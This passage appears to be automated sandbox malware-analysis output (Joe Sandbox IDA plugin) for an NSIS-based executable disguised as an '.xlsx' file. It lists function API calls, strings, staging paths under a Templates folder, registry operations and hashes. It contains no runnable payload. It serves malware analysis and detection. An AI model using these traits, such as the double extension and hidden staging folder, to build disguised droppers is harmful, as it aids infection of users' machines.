ShowWindow.USER32(?,0000000A), ref: 00404157

Strings

4Ct, xrefs: 00404071
&B, xrefs: 00403FFB

Memory Dump Source

Source File: 00000000.00000002.2288886848.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2288873587.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2288940792.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2288954314.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2288954314.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2288954314.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2288954314.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2288954314.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2288954314.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2289109450.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_09-FD-94.jbxd

Similarity

API ID: Window$Item$MessageSend$Show$EnableLongMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
String ID: 4Ct$&B
API String ID: 3282139019-3485676415
Opcode ID: 1ba26ddb7cc3656f9a64845b4b1793df4e6810f285f0ef41b34257c574bccbbf
Instruction ID: 615a13079a357bc63dc92eaebf5b97e46402dd0953b19927b77141fc7a078d9b
Opcode Fuzzy Hash: 1ba26ddb7cc3656f9a64845b4b1793df4e6810f285f0ef41b34257c574bccbbf
Instruction Fuzzy Hash: B6C1A371A04201BBDB216F61ED49E2B3AA8FB95705F40093EF601B51F1C7799892DB2E

Function 0040391F Relevance: 51.0, APIs: 15, Strings: 14, Instructions: 216
stringregistrylibraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 004062B2: GetModuleHandleA.KERNEL32(?,?,?,0040339D,00000009), ref: 004062C4
Part of subcall function 004062B2: LoadLibraryA.KERNELBASE(?,?,?,0040339D,00000009), ref: 004062CF
Part of subcall function 004062B2: GetProcAddress.KERNEL32(00000000,?), ref: 004062E0

lstrcatW.KERNEL32(1033,004226E8,80000001,Control Panel\Desktop\ResourceLocale,00000000,004226E8,00000000,00000002,C:\Users\user\AppData\Local\Temp\,76233420,00000000,"C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exe"), ref: 004039A0
lstrlenW.KERNEL32(Call,?,?,?,Call,00000000,C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\typhlostomy,1033,004226E8,80000001,Control Panel\Desktop\ResourceLocale,00000000,004226E8,00000000,00000002,C:\Users\user\AppData\Local\Temp\), ref: 00403A20
lstrcmpiW.KERNEL32(?,.exe,Call,?,?,?,Call,00000000,C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\typhlostomy,1033,004226E8,80000001,Control Panel\Desktop\ResourceLocale,00000000,004226E8,00000000), ref: 00403A33
GetFileAttributesW.KERNEL32(Call), ref: 00403A3E
LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\typhlostomy), ref: 00403A87

Part of subcall function 00405E8F: wsprintfW.USER32 ref: 00405E9C

RegisterClassW.USER32(004281A0), ref: 00403AC4
SystemParametersInfoW.USER32(?,00000000,?,00000000), ref: 00403ADC
CreateWindowExW.USER32(?,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403B11
ShowWindow.USER32(00000005,00000000), ref: 00403B47
LoadLibraryW.KERNELBASE(RichEd20), ref: 00403B58
LoadLibraryW.KERNEL32(RichEd32), ref: 00403B63
GetClassInfoW.USER32(00000000,RichEdit20W,004281A0), ref: 00403B73
GetClassInfoW.USER32(00000000,RichEdit,004281A0), ref: 00403B80
RegisterClassW.USER32(004281A0), ref: 00403B89
DialogBoxParamW.USER32(?,00000000,00403CC2,00000000), ref: 00403BA8

Strings

1033, xrefs: 0040393F, 0040399B
Call, xrefs: 004039E7, 004039F0, 004039FE, 00403A4D, 00403A53
"C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exe", xrefs: 00403922
RichEd32, xrefs: 00403B5E
&B, xrefs: 0040394B
RichEdit, xrefs: 00403B7A
RichEd20, xrefs: 00403B53
_Nb, xrefs: 00403AA3, 00403B0B
C:\Users\user\AppData\Local\Temp\, xrefs: 0040392B
.DEFAULT\Control Panel\International, xrefs: 0040398B
C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\typhlostomy, xrefs: 004039AF, 004039B7, 00403A5A, 00403A60, 00403A70
.exe, xrefs: 00403A2D
RichEdit20W, xrefs: 00403B6B, 00403B71
Control Panel\Desktop\ResourceLocale, xrefs: 00403953

Memory Dump Source

Source File: 00000000.00000002.2288886848.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2288873587.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2288940792.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2288954314.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2288954314.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2288954314.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2288954314.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2288954314.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2288954314.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2289109450.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_09-FD-94.jbxd

Similarity

API ID: ClassLoad$InfoLibrary$RegisterWindow$AddressAttributesCreateDialogFileHandleImageModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
String ID: "C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exe"$.DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\typhlostomy$Call$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb$&B
API String ID: 914957316-4138227134
Opcode ID: 88edaa45a3bb59404545fecdb829bfa4bbc7651b3de16964f3c32b9c1e3b42f4
Instruction ID: 309fb0296e4a6d1bba18aa3b2e86eaa258190dfd088e540a173f113b23667d40
Opcode Fuzzy Hash: 88edaa45a3bb59404545fecdb829bfa4bbc7651b3de16964f3c32b9c1e3b42f4
Instruction Fuzzy Hash: BE61B570644200BED720AF669C46F2B3A7CEB84749F40457FF945B62E2DB796902CA3D

Function 00402DBC Relevance: 26.5, APIs: 5, Strings: 10, Instructions: 203
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetTickCount.KERNEL32 ref: 00402DD0
GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exe,?), ref: 00402DEC

Part of subcall function 00405BB4: GetFileAttributesW.KERNELBASE(00000003,00402DFF,C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exe,80000000,00000003), ref: 00405BB8
Part of subcall function 00405BB4: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405BDA

GetFileSize.KERNEL32(00000000,00000000,00438000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exe,C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exe,80000000,00000003), ref: 00402E35
GlobalAlloc.KERNELBASE(?,00409230), ref: 00402F7C

Strings

Null, xrefs: 00402EB5
"C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exe", xrefs: 00402DC5
Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author , xrefs: 00403013
Error launching installer, xrefs: 00402E0C
C:\Users\user\Desktop, xrefs: 00402E17, 00402E1C, 00402E22
C:\Users\user\AppData\Local\Temp\, xrefs: 00402DC9, 00402F94
Error writing temporary file. Make sure your temp folder is valid., xrefs: 00402FC5
Inst, xrefs: 00402EA3
C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exe, xrefs: 00402DD6, 00402DE5, 00402DF9, 00402E16
soft, xrefs: 00402EAC

Memory Dump Source

Source File: 00000000.00000002.2288886848.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2288873587.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2288940792.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2288954314.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2288954314.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2288954314.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2288954314.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2288954314.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2288954314.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2289109450.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_09-FD-94.jbxd

Similarity

API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
String ID: "C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exe"$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exe$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
API String ID: 2803837635-2496236304
Opcode ID: 2c04d8be77adb3a6b73fa5f9521984b3b61a83da92e99188d87d195f815dd541
Instruction ID: b2cc58b1aa553f56ba66d3b0850f03698e33e3340d89f7fe3e9d1fe3a0eb5287
Opcode Fuzzy Hash: 2c04d8be77adb3a6b73fa5f9521984b3b61a83da92e99188d87d195f815dd541
Instruction Fuzzy Hash: 43610371941205ABDB209FA4DD85B9E3BB8EB04354F20447BF605B72D2C7BC9E418BAD

Function 00401752 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 145
stringtimeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

lstrcatW.KERNEL32(00000000,00000000,Call,C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\typhlostomy\Carfuffling,?,?,00000031), ref: 00401793
CompareFileTime.KERNEL32(-00000014,?,Call,Call,00000000,00000000,Call,C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\typhlostomy\Carfuffling,?,?,00000031), ref: 004017B8

Part of subcall function 00405F48: lstrcpynW.KERNEL32(?,?,?,004033C8,00428200,NSIS Error), ref: 00405F55

Part of subcall function 004051F2: lstrlenW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nseDB62.tmp\System.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D94,00000000,?), ref: 0040522A
Part of subcall function 004051F2: lstrlenW.KERNEL32(00402D94,Skipped: C:\Users\user\AppData\Local\Temp\nseDB62.tmp\System.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D94,00000000), ref: 0040523A
Part of subcall function 004051F2: lstrcatW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nseDB62.tmp\System.dll,00402D94,00402D94,Skipped: C:\Users\user\AppData\Local\Temp\nseDB62.tmp\System.dll,00000000,00000000,00000000), ref: 0040524D
Part of subcall function 004051F2: SetWindowTextW.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nseDB62.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nseDB62.tmp\System.dll), ref: 0040525F
Part of subcall function 004051F2: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405285
Part of subcall function 004051F2: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040529F
Part of subcall function 004051F2: SendMessageW.USER32(?,00001013,?,00000000), ref: 004052AD

Strings

C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\typhlostomy\Carfuffling, xrefs: 00401781
C:\Users\user\AppData\Local\Temp\nseDB62.tmp, xrefs: 00401804, 00401822
Call, xrefs: 00401770, 00401779, 00401786, 004017A4, 004017DA, 004017F0, 0040180E, 0040184A, 004018CB, 004018D4, 004018DE, 004018E9
C:\Users\user\AppData\Local\Temp\nseDB62.tmp\System.dll, xrefs: 00401818, 00401834

Memory Dump Source

Source File: 00000000.00000002.2288886848.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2288873587.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2288940792.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2288954314.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2288954314.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2288954314.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2288954314.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2288954314.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2288954314.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2289109450.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_09-FD-94.jbxd

Similarity

API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
String ID: C:\Users\user\AppData\Local\Temp\nseDB62.tmp$C:\Users\user\AppData\Local\Temp\nseDB62.tmp\System.dll$C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\typhlostomy\Carfuffling$Call
API String ID: 1941528284-15131886
Opcode ID: 0879d69bed4c8f472b86b9e85b84126f8f74c5a625f2fad1261ba299a3e5c0dd
Instruction ID: 22a22a0f5d261001ccd7191b61e6a6ae22ba545f5f0eb33ed6189b5534195358
Opcode Fuzzy Hash: 0879d69bed4c8f472b86b9e85b84126f8f74c5a625f2fad1261ba299a3e5c0dd
Instruction Fuzzy Hash: 3341C071900515BACF11BBB5CC86EAF3679EF06369F20423BF422B10E1C73C8A419A6D

Function 004051F2 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 72
stringwindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

lstrlenW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nseDB62.tmp\System.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D94,00000000,?), ref: 0040522A
lstrlenW.KERNEL32(00402D94,Skipped: C:\Users\user\AppData\Local\Temp\nseDB62.tmp\System.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D94,00000000), ref: 0040523A
lstrcatW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nseDB62.tmp\System.dll,00402D94,00402D94,Skipped: C:\Users\user\AppData\Local\Temp\nseDB62.tmp\System.dll,00000000,00000000,00000000), ref: 0040524D
SetWindowTextW.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nseDB62.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nseDB62.tmp\System.dll), ref: 0040525F
SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405285
SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040529F
SendMessageW.USER32(?,00001013,?,00000000), ref: 004052AD

Strings

Skipped: C:\Users\user\AppData\Local\Temp\nseDB62.tmp\System.dll, xrefs: 00405213, 00405223, 00405229, 0040524C, 00405258

Memory Dump Source

Source File: 00000000.00000002.2288886848.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2288873587.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2288940792.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2288954314.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2288954314.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2288954314.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2288954314.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2288954314.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2288954314.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2289109450.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_09-FD-94.jbxd

Similarity

API ID: MessageSend$lstrlen$TextWindowlstrcat
String ID: Skipped: C:\Users\user\AppData\Local\Temp\nseDB62.tmp\System.dll
API String ID: 2531174081-2415572159
Opcode ID: f10eb8b4edb837a623621e96def193046de5dd0ca1a8e17f40592997c05f4a34
Instruction ID: 09d17c59ce7287a2cbf3dc662f19c44123261f726eb293d34c68041fb2ac0666
Opcode Fuzzy Hash: f10eb8b4edb837a623621e96def193046de5dd0ca1a8e17f40592997c05f4a34
Instruction Fuzzy Hash: CA21A131900558BBCB219FA5DD849DFBFB8EF54310F14807AF904B62A0C3798A81CFA8

Function 00402573 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 142
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ReadFile.KERNELBASE(?,?,?,?), ref: 004025DB
MultiByteToWideChar.KERNEL32(?,?,?,?,?,00000001), ref: 00402616
SetFilePointer.KERNELBASE(?,?,?,00000001,?,?,?,?,?,00000001), ref: 00402639
MultiByteToWideChar.KERNEL32(?,?,?,00000000,?,00000001,?,00000001,?,?,?,?,?,00000001), ref: 0040264F

Part of subcall function 00405C37: ReadFile.KERNELBASE(00409230,00000000,00000000,00000000,00000000,00413E90,0040BE90,0040330C,00409230,00409230,004031FE,00413E90,00004000,?,00000000,?), ref: 00405C4B

Part of subcall function 00405E8F: wsprintfW.USER32 ref: 00405E9C

Strings

9, xrefs: 004025BE

Memory Dump Source

Source File: 00000000.00000002.2288886848.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2288873587.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2288940792.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2288954314.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2288954314.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2288954314.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2288954314.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2288954314.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2288954314.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2289109450.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_09-FD-94.jbxd

Similarity

API ID: File$ByteCharMultiReadWide$Pointerwsprintf
String ID: 9
API String ID: 1149667376-2366072709
Opcode ID: 14d7a1a443259207830479a75009ee39c6dacd7ae2e8022bb32dc9fb2f0741b6
Instruction ID: 34008a6f5bb5370994306dbe4266d00811a1d2e87b5126a94146f67fdcf6739f
Opcode Fuzzy Hash: 14d7a1a443259207830479a75009ee39c6dacd7ae2e8022bb32dc9fb2f0741b6
Instruction Fuzzy Hash: 0E51E771E04209ABDF24DF94DE88AAEB779FF04304F50443BE511B62D0D7B99A42CB69

Function 004015B9 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 57
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00405A3E: CharNextW.USER32(?,?,00424EF0,?,00405AB2,00424EF0,00424EF0,?,?,76232EE0,004057F0,?,C:\Users\user\AppData\Local\Temp\,76232EE0,"C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exe"), ref: 00405A4C
Part of subcall function 00405A3E: CharNextW.USER32(00000000), ref: 00405A51
Part of subcall function 00405A3E: CharNextW.USER32(00000000), ref: 00405A69

CreateDirectoryW.KERNELBASE(?,?,00000000,?,00000000,?), ref: 004015E3
GetLastError.KERNEL32(?,00000000,?,00000000,?), ref: 004015ED
GetFileAttributesW.KERNELBASE(?,?,00000000,?,00000000,?), ref: 004015FD
SetCurrentDirectoryW.KERNELBASE(?,C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\typhlostomy\Carfuffling,?,00000000,?), ref: 00401630

Strings

C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\typhlostomy\Carfuffling, xrefs: 00401623

Memory Dump Source

Source File: 00000000.00000002.2288886848.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2288873587.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2288940792.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2288954314.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2288954314.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2288954314.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2288954314.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2288954314.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2288954314.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2289109450.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_09-FD-94.jbxd

Similarity

API ID: CharNext$Directory$AttributesCreateCurrentErrorFileLast
String ID: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\typhlostomy\Carfuffling
API String ID: 3751793516-4070182260
Opcode ID: 9b673ddbf1d69572a6be76a75328456f52fe096521e7ed3c2b5c74dd951979b8
Instruction ID: 602e027c19ef8137931421d3e2870900c2c1aa36f58208ee64056e3add0ea48c
Opcode Fuzzy Hash: 9b673ddbf1d69572a6be76a75328456f52fe096521e7ed3c2b5c74dd951979b8
Instruction Fuzzy Hash: 4F11C271904200EBCF206FA0CD449AE7AB4FF14369B34463BF881B62E1D23D49419A6E

Function 00402B7A Relevance: 7.6, APIs: 5, Instructions: 67
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegOpenKeyExW.KERNELBASE(?,?,00000000,?,?), ref: 00402B9B
RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402BD7
RegCloseKey.ADVAPI32(?), ref: 00402BE0
RegCloseKey.ADVAPI32(?), ref: 00402C05
RegDeleteKeyW.ADVAPI32(?,?), ref: 00402C23

Memory Dump Source

Source File: 00000000.00000002.2288886848.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2288873587.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2288940792.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2288954314.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2288954314.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2288954314.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2288954314.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2288954314.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2288954314.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2289109450.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_09-FD-94.jbxd

Similarity

API ID: Close$DeleteEnumOpen
String ID:
API String ID: 1912718029-0
Opcode ID: b547f4a97addcc1e8c82d95905b84b8973278d2723117ef79469a300e8f1f4e9
Instruction ID: 39c85bfe7ca74ada2351cc0a51ccebcd1f3e21716521df4e7e96f28c7df0de5f
Opcode Fuzzy Hash: b547f4a97addcc1e8c82d95905b84b8973278d2723117ef79469a300e8f1f4e9
Instruction Fuzzy Hash: 5B116A31904008FEEF229F90DE89EAE3B7DFB14348F100476FA01B00A0D3B59E51EA69

Function 10001759 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 118
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 10001B18: GlobalFree.KERNEL32(?), ref: 10001D83
Part of subcall function 10001B18: GlobalFree.KERNEL32(?), ref: 10001D88
Part of subcall function 10001B18: GlobalFree.KERNEL32(?), ref: 10001D8D

GlobalFree.KERNEL32(00000000), ref: 10001804
FreeLibrary.KERNEL32(?), ref: 1000187B
GlobalFree.KERNEL32(00000000), ref: 100018A0

Part of subcall function 10002286: GlobalAlloc.KERNEL32(?,00001020), ref: 100022B8

Part of subcall function 10002645: GlobalAlloc.KERNEL32(?,?,?,?,00000000,?,?,?,?,100017D5,00000000), ref: 100026B7

Part of subcall function 100015B4: lstrcpyW.KERNEL32(00000000,10004020,00000000,10001731,00000000), ref: 100015CD

Strings

, xrefs: 10001881

Memory Dump Source

Source File: 00000000.00000002.2298730471.0000000010001000.00000020.00000001.01000000.00000006.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.2298660622.0000000010000000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.2298760809.0000000010003000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.2299093531.0000000010005000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10000000_09-FD-94.jbxd

Similarity

API ID: Global$Free$Alloc$Librarylstrcpy
String ID:
API String ID: 1791698881-3916222277
Opcode ID: d19b98991503ed1f4222ee02892706a0c20354a75bd4722b3fc13797bb1a772f
Instruction ID: d353a68b508970880cf9150dbe01e0f77130c4103e9cfdf2e47557ee24e57a3c
Opcode Fuzzy Hash: d19b98991503ed1f4222ee02892706a0c20354a75bd4722b3fc13797bb1a772f
Instruction Fuzzy Hash: 5E31BF75804241AAFB14DF749CC9BDA37E8FF053D0F158065FA0A9A08FDF74A9848761

Function 00405E15 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 45
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegOpenKeyExW.KERNELBASE(?,?,00000000,?,?,00000002,Call,?,00406088,80000002,Software\Microsoft\Windows\CurrentVersion,?,Call,?), ref: 00405E3F
RegQueryValueExW.KERNELBASE(?,?,00000000,?,?,?,?,00406088,80000002,Software\Microsoft\Windows\CurrentVersion,?,Call,?), ref: 00405E60
RegCloseKey.ADVAPI32(?,?,00406088,80000002,Software\Microsoft\Windows\CurrentVersion,?,Call,?), ref: 00405E83

Strings

Call, xrefs: 00405E18

Memory Dump Source

Source File: 00000000.00000002.2288886848.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2288873587.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2288940792.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2288954314.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2288954314.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2288954314.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2288954314.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2288954314.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2288954314.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2289109450.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_09-FD-94.jbxd

Similarity

API ID: CloseOpenQueryValue
String ID: Call
API String ID: 3677997916-1824292864
Opcode ID: 6d49e1ec12a7b24cc87819d5cf70687d25a5c21dfc25d1df192b84af38ef9460
